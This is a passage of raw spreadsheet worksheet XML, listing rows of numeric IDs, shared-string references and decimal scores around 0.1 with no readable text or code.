    <row r="31971" ht="15.75" customHeight="1">
      <c r="A31971" s="1">
        <v>26293.0</v>
      </c>
      <c r="B31971" s="2">
        <v>1.6489102E7</v>
      </c>
      <c r="C31971" s="2" t="s">
        <v>30757</v>
      </c>
      <c r="D31971" s="2">
        <v>1.0</v>
      </c>
      <c r="E31971" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31971" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31972" ht="15.75" customHeight="1">
      <c r="A31972" s="1">
        <v>26759.0</v>
      </c>
      <c r="B31972" s="2">
        <v>1.8443874E7</v>
      </c>
      <c r="C31972" s="2" t="s">
        <v>30758</v>
      </c>
      <c r="D31972" s="2">
        <v>1.0</v>
      </c>
      <c r="E31972" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31972" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31973" ht="15.75" customHeight="1">
      <c r="A31973" s="1">
        <v>27033.0</v>
      </c>
      <c r="B31973" s="2">
        <v>2.0143508E7</v>
      </c>
      <c r="C31973" s="2" t="s">
        <v>30759</v>
      </c>
      <c r="D31973" s="2">
        <v>1.0</v>
      </c>
      <c r="E31973" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31973" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31974" ht="15.75" customHeight="1">
      <c r="A31974" s="1">
        <v>27036.0</v>
      </c>
      <c r="B31974" s="2">
        <v>2.0143508E7</v>
      </c>
      <c r="C31974" s="2" t="s">
        <v>30760</v>
      </c>
      <c r="D31974" s="2">
        <v>1.0</v>
      </c>
      <c r="E31974" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31974" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31975" ht="15.75" customHeight="1">
      <c r="A31975" s="1">
        <v>27431.0</v>
      </c>
      <c r="B31975" s="2">
        <v>2.1920157E7</v>
      </c>
      <c r="C31975" s="2" t="s">
        <v>30761</v>
      </c>
      <c r="D31975" s="2">
        <v>1.0</v>
      </c>
      <c r="E31975" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31975" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31976" ht="15.75" customHeight="1">
      <c r="A31976" s="1">
        <v>27880.0</v>
      </c>
      <c r="B31976" s="2">
        <v>2.3558686E7</v>
      </c>
      <c r="C31976" s="2" t="s">
        <v>30762</v>
      </c>
      <c r="D31976" s="2">
        <v>1.0</v>
      </c>
      <c r="E31976" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31976" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31977" ht="15.75" customHeight="1">
      <c r="A31977" s="1">
        <v>28468.0</v>
      </c>
      <c r="B31977" s="2">
        <v>2.6615476E7</v>
      </c>
      <c r="C31977" s="2" t="s">
        <v>30763</v>
      </c>
      <c r="D31977" s="2">
        <v>1.0</v>
      </c>
      <c r="E31977" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31977" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31978" ht="15.75" customHeight="1">
      <c r="A31978" s="1">
        <v>29981.0</v>
      </c>
      <c r="B31978" s="2">
        <v>3.6106762E7</v>
      </c>
      <c r="C31978" s="2" t="s">
        <v>30764</v>
      </c>
      <c r="D31978" s="2">
        <v>1.0</v>
      </c>
      <c r="E31978" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31978" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31979" ht="15.75" customHeight="1">
      <c r="A31979" s="1">
        <v>30622.0</v>
      </c>
      <c r="B31979" s="2">
        <v>4.1359793E7</v>
      </c>
      <c r="C31979" s="2" t="s">
        <v>30765</v>
      </c>
      <c r="D31979" s="2">
        <v>1.0</v>
      </c>
      <c r="E31979" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31979" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31980" ht="15.75" customHeight="1">
      <c r="A31980" s="1">
        <v>31547.0</v>
      </c>
      <c r="B31980" s="2">
        <v>5.1124115E7</v>
      </c>
      <c r="C31980" s="2" t="s">
        <v>30766</v>
      </c>
      <c r="D31980" s="2">
        <v>1.0</v>
      </c>
      <c r="E31980" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31980" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31981" ht="15.75" customHeight="1">
      <c r="A31981" s="1">
        <v>31775.0</v>
      </c>
      <c r="B31981" s="2">
        <v>5219867.0</v>
      </c>
      <c r="C31981" s="2" t="s">
        <v>30767</v>
      </c>
      <c r="D31981" s="2">
        <v>1.0</v>
      </c>
      <c r="E31981" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31981" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31982" ht="15.75" customHeight="1">
      <c r="A31982" s="1">
        <v>32456.0</v>
      </c>
      <c r="B31982" s="2">
        <v>5671041.0</v>
      </c>
      <c r="C31982" s="2" t="s">
        <v>30768</v>
      </c>
      <c r="D31982" s="2">
        <v>1.0</v>
      </c>
      <c r="E31982" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31982" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31983" ht="15.75" customHeight="1">
      <c r="A31983" s="1">
        <v>32917.0</v>
      </c>
      <c r="B31983" s="2">
        <v>6417282.0</v>
      </c>
      <c r="C31983" s="2" t="s">
        <v>30769</v>
      </c>
      <c r="D31983" s="2">
        <v>1.0</v>
      </c>
      <c r="E31983" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31983" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31984" ht="15.75" customHeight="1">
      <c r="A31984" s="1">
        <v>33355.0</v>
      </c>
      <c r="B31984" s="2">
        <v>7615453.0</v>
      </c>
      <c r="C31984" s="2" t="s">
        <v>30770</v>
      </c>
      <c r="D31984" s="2">
        <v>1.0</v>
      </c>
      <c r="E31984" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31984" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31985" ht="15.75" customHeight="1">
      <c r="A31985" s="1">
        <v>11957.0</v>
      </c>
      <c r="B31985" s="2">
        <v>2.5595429E7</v>
      </c>
      <c r="C31985" s="2" t="s">
        <v>30771</v>
      </c>
      <c r="D31985" s="2">
        <v>1.0</v>
      </c>
      <c r="E31985" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31985" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="31986" ht="15.75" customHeight="1">
      <c r="A31986" s="1">
        <v>12834.0</v>
      </c>
      <c r="B31986" s="2">
        <v>3.1655749E7</v>
      </c>
      <c r="C31986" s="2" t="s">
        <v>30772</v>
      </c>
      <c r="D31986" s="2">
        <v>1.0</v>
      </c>
      <c r="E31986" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31986" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="31987" ht="15.75" customHeight="1">
      <c r="A31987" s="1">
        <v>20992.0</v>
      </c>
      <c r="B31987" s="2">
        <v>1.7071836E7</v>
      </c>
      <c r="C31987" s="2" t="s">
        <v>30773</v>
      </c>
      <c r="D31987" s="2">
        <v>1.0</v>
      </c>
      <c r="E31987" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31987" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="31988" ht="15.75" customHeight="1">
      <c r="A31988" s="1">
        <v>24248.0</v>
      </c>
      <c r="B31988" s="2">
        <v>1.0500615E7</v>
      </c>
      <c r="C31988" s="2" t="s">
        <v>30774</v>
      </c>
      <c r="D31988" s="2">
        <v>1.0</v>
      </c>
      <c r="E31988" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31988" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="31989" ht="15.75" customHeight="1">
      <c r="A31989" s="1">
        <v>25094.0</v>
      </c>
      <c r="B31989" s="2">
        <v>1.292016E7</v>
      </c>
      <c r="C31989" s="2" t="s">
        <v>30775</v>
      </c>
      <c r="D31989" s="2">
        <v>1.0</v>
      </c>
      <c r="E31989" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31989" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="31990" ht="15.75" customHeight="1">
      <c r="A31990" s="1">
        <v>25183.0</v>
      </c>
      <c r="B31990" s="2">
        <v>1.3129173E7</v>
      </c>
      <c r="C31990" s="2" t="s">
        <v>30776</v>
      </c>
      <c r="D31990" s="2">
        <v>1.0</v>
      </c>
      <c r="E31990" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31990" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="31991" ht="15.75" customHeight="1">
      <c r="A31991" s="1">
        <v>26405.0</v>
      </c>
      <c r="B31991" s="2">
        <v>1.7071835E7</v>
      </c>
      <c r="C31991" s="2" t="s">
        <v>30773</v>
      </c>
      <c r="D31991" s="2">
        <v>1.0</v>
      </c>
      <c r="E31991" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31991" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="31992" ht="15.75" customHeight="1">
      <c r="A31992" s="1">
        <v>26680.0</v>
      </c>
      <c r="B31992" s="2">
        <v>1.8100506E7</v>
      </c>
      <c r="C31992" s="2" t="s">
        <v>30777</v>
      </c>
      <c r="D31992" s="2">
        <v>1.0</v>
      </c>
      <c r="E31992" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31992" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="31993" ht="15.75" customHeight="1">
      <c r="A31993" s="1">
        <v>27423.0</v>
      </c>
      <c r="B31993" s="2">
        <v>2.1884446E7</v>
      </c>
      <c r="C31993" s="2" t="s">
        <v>30778</v>
      </c>
      <c r="D31993" s="2">
        <v>1.0</v>
      </c>
      <c r="E31993" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31993" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="31994" ht="15.75" customHeight="1">
      <c r="A31994" s="1">
        <v>29275.0</v>
      </c>
      <c r="B31994" s="2">
        <v>3.0994721E7</v>
      </c>
      <c r="C31994" s="2" t="s">
        <v>30779</v>
      </c>
      <c r="D31994" s="2">
        <v>1.0</v>
      </c>
      <c r="E31994" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31994" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="31995" ht="15.75" customHeight="1">
      <c r="A31995" s="1">
        <v>31631.0</v>
      </c>
      <c r="B31995" s="2">
        <v>5146839.0</v>
      </c>
      <c r="C31995" s="2" t="s">
        <v>30775</v>
      </c>
      <c r="D31995" s="2">
        <v>1.0</v>
      </c>
      <c r="E31995" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31995" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="31996" ht="15.75" customHeight="1">
      <c r="A31996" s="1">
        <v>33499.0</v>
      </c>
      <c r="B31996" s="2">
        <v>8051272.0</v>
      </c>
      <c r="C31996" s="2" t="s">
        <v>30780</v>
      </c>
      <c r="D31996" s="2">
        <v>1.0</v>
      </c>
      <c r="E31996" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31996" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="31997" ht="15.75" customHeight="1">
      <c r="A31997" s="1">
        <v>11361.0</v>
      </c>
      <c r="B31997" s="2">
        <v>2.1342773E7</v>
      </c>
      <c r="C31997" s="2" t="s">
        <v>30781</v>
      </c>
      <c r="D31997" s="2">
        <v>1.0</v>
      </c>
      <c r="E31997" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31997" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="31998" ht="15.75" customHeight="1">
      <c r="A31998" s="1">
        <v>76.0</v>
      </c>
      <c r="B31998" s="2">
        <v>1.1780795E7</v>
      </c>
      <c r="C31998" s="2" t="s">
        <v>30782</v>
      </c>
      <c r="D31998" s="2">
        <v>1.0</v>
      </c>
      <c r="E31998" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31998" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="31999" ht="15.75" customHeight="1">
      <c r="A31999" s="1">
        <v>8597.0</v>
      </c>
      <c r="B31999" s="2">
        <v>5.4247335E7</v>
      </c>
      <c r="C31999" s="2" t="s">
        <v>30783</v>
      </c>
      <c r="D31999" s="2">
        <v>1.0</v>
      </c>
      <c r="E31999" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31999" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="32000" ht="15.75" customHeight="1">
      <c r="A32000" s="1">
        <v>18602.0</v>
      </c>
      <c r="B32000" s="2">
        <v>5.3281503E7</v>
      </c>
      <c r="C32000" s="2" t="s">
        <v>30784</v>
      </c>
      <c r="D32000" s="2">
        <v>1.0</v>
      </c>
      <c r="E32000" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32000" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="32001" ht="15.75" customHeight="1">
      <c r="A32001" s="1">
        <v>20348.0</v>
      </c>
      <c r="B32001" s="2">
        <v>1.1630586E7</v>
      </c>
      <c r="C32001" s="2" t="s">
        <v>30785</v>
      </c>
      <c r="D32001" s="2">
        <v>1.0</v>
      </c>
      <c r="E32001" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32001" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="32002" ht="15.75" customHeight="1">
      <c r="A32002" s="1">
        <v>26899.0</v>
      </c>
      <c r="B32002" s="2">
        <v>1.9283007E7</v>
      </c>
      <c r="C32002" s="2" t="s">
        <v>30786</v>
      </c>
      <c r="D32002" s="2">
        <v>1.0</v>
      </c>
      <c r="E32002" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32002" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="32003" ht="15.75" customHeight="1">
      <c r="A32003" s="1">
        <v>4738.0</v>
      </c>
      <c r="B32003" s="2">
        <v>4.3342149E7</v>
      </c>
      <c r="C32003" s="2" t="s">
        <v>30787</v>
      </c>
      <c r="D32003" s="2">
        <v>1.0</v>
      </c>
      <c r="E32003" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32003" s="2">
        <v>0.09999999999999999</v>
      </c>
    </row>
    <row r="32004" ht="15.75" customHeight="1">
      <c r="A32004" s="1">
        <v>12702.0</v>
      </c>
      <c r="B32004" s="2">
        <v>3.0811531E7</v>
      </c>
      <c r="C32004" s="2" t="s">
        <v>30788</v>
      </c>
      <c r="D32004" s="2">
        <v>1.0</v>
      </c>
      <c r="E32004" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32004" s="2">
        <v>0.09999999999999999</v>
      </c>
    </row>
    <row r="32005" ht="15.75" customHeight="1">
      <c r="A32005" s="1">
        <v>19953.0</v>
      </c>
      <c r="B32005" s="2">
        <v>5.7521269E7</v>
      </c>
      <c r="C32005" s="2" t="s">
        <v>30789</v>
      </c>
      <c r="D32005" s="2">
        <v>1.0</v>
      </c>
      <c r="E32005" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32005" s="2">
        <v>0.09999999999999999</v>
      </c>
    </row>
    <row r="32006" ht="15.75" customHeight="1">
      <c r="A32006" s="1">
        <v>4277.0</v>
      </c>
      <c r="B32006" s="2">
        <v>4.1878579E7</v>
      </c>
      <c r="C32006" s="2" t="s">
        <v>30790</v>
      </c>
      <c r="D32006" s="2">
        <v>1.0</v>
      </c>
      <c r="E32006" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32006" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="32007" ht="15.75" customHeight="1">
      <c r="A32007" s="1">
        <v>7546.0</v>
      </c>
      <c r="B32007" s="2">
        <v>5.1494246E7</v>
      </c>
      <c r="C32007" s="2" t="s">
        <v>30791</v>
      </c>
      <c r="D32007" s="2">
        <v>1.0</v>
      </c>
      <c r="E32007" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32007" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="32008" ht="15.75" customHeight="1">
      <c r="A32008" s="1">
        <v>11311.0</v>
      </c>
      <c r="B32008" s="2">
        <v>2.102189E7</v>
      </c>
      <c r="C32008" s="2" t="s">
        <v>30792</v>
      </c>
      <c r="D32008" s="2">
        <v>1.0</v>
      </c>
      <c r="E32008" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32008" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="32009" ht="15.75" customHeight="1">
      <c r="A32009" s="1">
        <v>11708.0</v>
      </c>
      <c r="B32009" s="2">
        <v>2.3585455E7</v>
      </c>
      <c r="C32009" s="2" t="s">
        <v>30793</v>
      </c>
      <c r="D32009" s="2">
        <v>1.0</v>
      </c>
      <c r="E32009" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32009" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="32010" ht="15.75" customHeight="1">
      <c r="A32010" s="1">
        <v>14512.0</v>
      </c>
      <c r="B32010" s="2">
        <v>3.9737624E7</v>
      </c>
      <c r="C32010" s="2" t="s">
        <v>30794</v>
      </c>
      <c r="D32010" s="2">
        <v>1.0</v>
      </c>
      <c r="E32010" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32010" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="32011" ht="15.75" customHeight="1">
      <c r="A32011" s="1">
        <v>20393.0</v>
      </c>
      <c r="B32011" s="2">
        <v>1.20676E7</v>
      </c>
      <c r="C32011" s="2" t="s">
        <v>30795</v>
      </c>
      <c r="D32011" s="2">
        <v>1.0</v>
      </c>
      <c r="E32011" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32011" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="32012" ht="15.75" customHeight="1">
      <c r="A32012" s="1">
        <v>25408.0</v>
      </c>
      <c r="B32012" s="2">
        <v>1.37706E7</v>
      </c>
      <c r="C32012" s="2" t="s">
        <v>30796</v>
      </c>
      <c r="D32012" s="2">
        <v>1.0</v>
      </c>
      <c r="E32012" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32012" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="32013" ht="15.75" customHeight="1">
      <c r="A32013" s="1">
        <v>1002.0</v>
      </c>
      <c r="B32013" s="2">
        <v>2.3007498E7</v>
      </c>
      <c r="C32013" s="2" t="s">
        <v>30797</v>
      </c>
      <c r="D32013" s="2">
        <v>1.0</v>
      </c>
      <c r="E32013" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32013" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="32014" ht="15.75" customHeight="1">
      <c r="A32014" s="1">
        <v>2060.0</v>
      </c>
      <c r="B32014" s="2">
        <v>3.103758E7</v>
      </c>
      <c r="C32014" s="2" t="s">
        <v>30798</v>
      </c>
      <c r="D32014" s="2">
        <v>1.0</v>
      </c>
      <c r="E32014" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32014" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="32015" ht="15.75" customHeight="1">
      <c r="A32015" s="1">
        <v>10628.0</v>
      </c>
      <c r="B32015" s="2">
        <v>1.387055E7</v>
      </c>
      <c r="C32015" s="2" t="s">
        <v>30799</v>
      </c>
      <c r="D32015" s="2">
        <v>1.0</v>
      </c>
      <c r="E32015" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32015" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="32016" ht="15.75" customHeight="1">
      <c r="A32016" s="1">
        <v>22686.0</v>
      </c>
      <c r="B32016" s="2">
        <v>4.2169863E7</v>
      </c>
      <c r="C32016" s="2" t="s">
        <v>30800</v>
      </c>
      <c r="D32016" s="2">
        <v>1.0</v>
      </c>
      <c r="E32016" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32016" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="32017" ht="15.75" customHeight="1">
      <c r="A32017" s="1">
        <v>13404.0</v>
      </c>
      <c r="B32017" s="2">
        <v>3.499625E7</v>
      </c>
      <c r="C32017" s="2" t="s">
        <v>30801</v>
      </c>
      <c r="D32017" s="2">
        <v>1.0</v>
      </c>
      <c r="E32017" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32017" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="32018" ht="15.75" customHeight="1">
      <c r="A32018" s="1">
        <v>15060.0</v>
      </c>
      <c r="B32018" s="2">
        <v>4.1698711E7</v>
      </c>
      <c r="C32018" s="2" t="s">
        <v>30802</v>
      </c>
      <c r="D32018" s="2">
        <v>1.0</v>
      </c>
      <c r="E32018" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32018" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="32019" ht="15.75" customHeight="1">
      <c r="A32019" s="1">
        <v>17104.0</v>
      </c>
      <c r="B32019" s="2">
        <v>4.8690849E7</v>
      </c>
      <c r="C32019" s="2" t="s">
        <v>30803</v>
      </c>
      <c r="D32019" s="2">
        <v>1.0</v>
      </c>
      <c r="E32019" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32019" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="32020" ht="15.75" customHeight="1">
      <c r="A32020" s="1">
        <v>19689.0</v>
      </c>
      <c r="B32020" s="2">
        <v>5.6470143E7</v>
      </c>
      <c r="C32020" s="2" t="s">
        <v>30804</v>
      </c>
      <c r="D32020" s="2">
        <v>1.0</v>
      </c>
      <c r="E32020" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32020" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="32021" ht="15.75" customHeight="1">
      <c r="A32021" s="1">
        <v>27264.0</v>
      </c>
      <c r="B32021" s="2">
        <v>2.1164051E7</v>
      </c>
      <c r="C32021" s="2" t="s">
        <v>30805</v>
      </c>
      <c r="D32021" s="2">
        <v>1.0</v>
      </c>
      <c r="E32021" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32021" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="32022" ht="15.75" customHeight="1">
      <c r="A32022" s="1">
        <v>28627.0</v>
      </c>
      <c r="B32022" s="2">
        <v>2.71738E7</v>
      </c>
      <c r="C32022" s="2" t="s">
        <v>30806</v>
      </c>
      <c r="D32022" s="2">
        <v>1.0</v>
      </c>
      <c r="E32022" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32022" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="32023" ht="15.75" customHeight="1">
      <c r="A32023" s="1">
        <v>31609.0</v>
      </c>
      <c r="B32023" s="2">
        <v>5.1407726E7</v>
      </c>
      <c r="C32023" s="2" t="s">
        <v>30807</v>
      </c>
      <c r="D32023" s="2">
        <v>1.0</v>
      </c>
      <c r="E32023" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32023" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="32024" ht="15.75" customHeight="1">
      <c r="A32024" s="1">
        <v>9068.0</v>
      </c>
      <c r="B32024" s="2">
        <v>5.5121804E7</v>
      </c>
      <c r="C32024" s="2" t="s">
        <v>30808</v>
      </c>
      <c r="D32024" s="2">
        <v>1.0</v>
      </c>
      <c r="E32024" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32024" s="2">
        <v>0.09979423868312753</v>
      </c>
    </row>
    <row r="32025" ht="15.75" customHeight="1">
      <c r="A32025" s="1">
        <v>17221.0</v>
      </c>
      <c r="B32025" s="2">
        <v>4.9064057E7</v>
      </c>
      <c r="C32025" s="2" t="s">
        <v>30809</v>
      </c>
      <c r="D32025" s="2">
        <v>1.0</v>
      </c>
      <c r="E32025" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32025" s="2">
        <v>0.09979423868312753</v>
      </c>
    </row>
    <row r="32026" ht="15.75" customHeight="1">
      <c r="A32026" s="1">
        <v>19324.0</v>
      </c>
      <c r="B32026" s="2">
        <v>5.5308727E7</v>
      </c>
      <c r="C32026" s="2" t="s">
        <v>30810</v>
      </c>
      <c r="D32026" s="2">
        <v>1.0</v>
      </c>
      <c r="E32026" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32026" s="2">
        <v>0.09979423868312753</v>
      </c>
    </row>
    <row r="32027" ht="15.75" customHeight="1">
      <c r="A32027" s="1">
        <v>27480.0</v>
      </c>
      <c r="B32027" s="2">
        <v>2.2019427E7</v>
      </c>
      <c r="C32027" s="2" t="s">
        <v>30811</v>
      </c>
      <c r="D32027" s="2">
        <v>1.0</v>
      </c>
      <c r="E32027" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32027" s="2">
        <v>0.09979423868312753</v>
      </c>
    </row>
    <row r="32028" ht="15.75" customHeight="1">
      <c r="A32028" s="1">
        <v>27929.0</v>
      </c>
      <c r="B32028" s="2">
        <v>2.3783547E7</v>
      </c>
      <c r="C32028" s="2" t="s">
        <v>30812</v>
      </c>
      <c r="D32028" s="2">
        <v>1.0</v>
      </c>
      <c r="E32028" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32028" s="2">
        <v>0.09979423868312753</v>
      </c>
    </row>
    <row r="32029" ht="15.75" customHeight="1">
      <c r="A32029" s="1">
        <v>16911.0</v>
      </c>
      <c r="B32029" s="2">
        <v>4.8120706E7</v>
      </c>
      <c r="C32029" s="2" t="s">
        <v>30813</v>
      </c>
      <c r="D32029" s="2">
        <v>1.0</v>
      </c>
      <c r="E32029" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32029" s="2">
        <v>0.09964726631393299</v>
      </c>
    </row>
    <row r="32030" ht="15.75" customHeight="1">
      <c r="A32030" s="1">
        <v>27422.0</v>
      </c>
      <c r="B32030" s="2">
        <v>2.1881011E7</v>
      </c>
      <c r="C32030" s="2" t="s">
        <v>30814</v>
      </c>
      <c r="D32030" s="2">
        <v>1.0</v>
      </c>
      <c r="E32030" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32030" s="2">
        <v>0.09964726631393299</v>
      </c>
    </row>
    <row r="32031" ht="15.75" customHeight="1">
      <c r="A32031" s="1">
        <v>482.0</v>
      </c>
      <c r="B32031" s="2">
        <v>1.7492345E7</v>
      </c>
      <c r="C32031" s="2" t="s">
        <v>30815</v>
      </c>
      <c r="D32031" s="2">
        <v>1.0</v>
      </c>
      <c r="E32031" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32031" s="2">
        <v>0.09958071278825997</v>
      </c>
    </row>
    <row r="32032" ht="15.75" customHeight="1">
      <c r="A32032" s="1">
        <v>7138.0</v>
      </c>
      <c r="B32032" s="2">
        <v>5.0443037E7</v>
      </c>
      <c r="C32032" s="2" t="s">
        <v>30816</v>
      </c>
      <c r="D32032" s="2">
        <v>1.0</v>
      </c>
      <c r="E32032" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32032" s="2">
        <v>0.09958071278825997</v>
      </c>
    </row>
    <row r="32033" ht="15.75" customHeight="1">
      <c r="A32033" s="1">
        <v>11206.0</v>
      </c>
      <c r="B32033" s="2">
        <v>2.0058672E7</v>
      </c>
      <c r="C32033" s="2" t="s">
        <v>30817</v>
      </c>
      <c r="D32033" s="2">
        <v>1.0</v>
      </c>
      <c r="E32033" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32033" s="2">
        <v>0.09958071278825997</v>
      </c>
    </row>
    <row r="32034" ht="15.75" customHeight="1">
      <c r="A32034" s="1">
        <v>14712.0</v>
      </c>
      <c r="B32034" s="2">
        <v>4.0623081E7</v>
      </c>
      <c r="C32034" s="2" t="s">
        <v>30818</v>
      </c>
      <c r="D32034" s="2">
        <v>1.0</v>
      </c>
      <c r="E32034" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32034" s="2">
        <v>0.09958071278825997</v>
      </c>
    </row>
    <row r="32035" ht="15.75" customHeight="1">
      <c r="A32035" s="1">
        <v>17592.0</v>
      </c>
      <c r="B32035" s="2">
        <v>5.0303964E7</v>
      </c>
      <c r="C32035" s="2" t="s">
        <v>30819</v>
      </c>
      <c r="D32035" s="2">
        <v>1.0</v>
      </c>
      <c r="E32035" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32035" s="2">
        <v>0.09958071278825997</v>
      </c>
    </row>
    <row r="32036" ht="15.75" customHeight="1">
      <c r="A32036" s="1">
        <v>29918.0</v>
      </c>
      <c r="B32036" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C32036" s="2" t="s">
        <v>30820</v>
      </c>
      <c r="D32036" s="2">
        <v>1.0</v>
      </c>
      <c r="E32036" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32036" s="2">
        <v>0.09958071278825997</v>
      </c>
    </row>
    <row r="32037" ht="15.75" customHeight="1">
      <c r="A32037" s="1">
        <v>6825.0</v>
      </c>
      <c r="B32037" s="2">
        <v>4.9590546E7</v>
      </c>
      <c r="C32037" s="2" t="s">
        <v>30821</v>
      </c>
      <c r="D32037" s="2">
        <v>1.0</v>
      </c>
      <c r="E32037" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32037" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
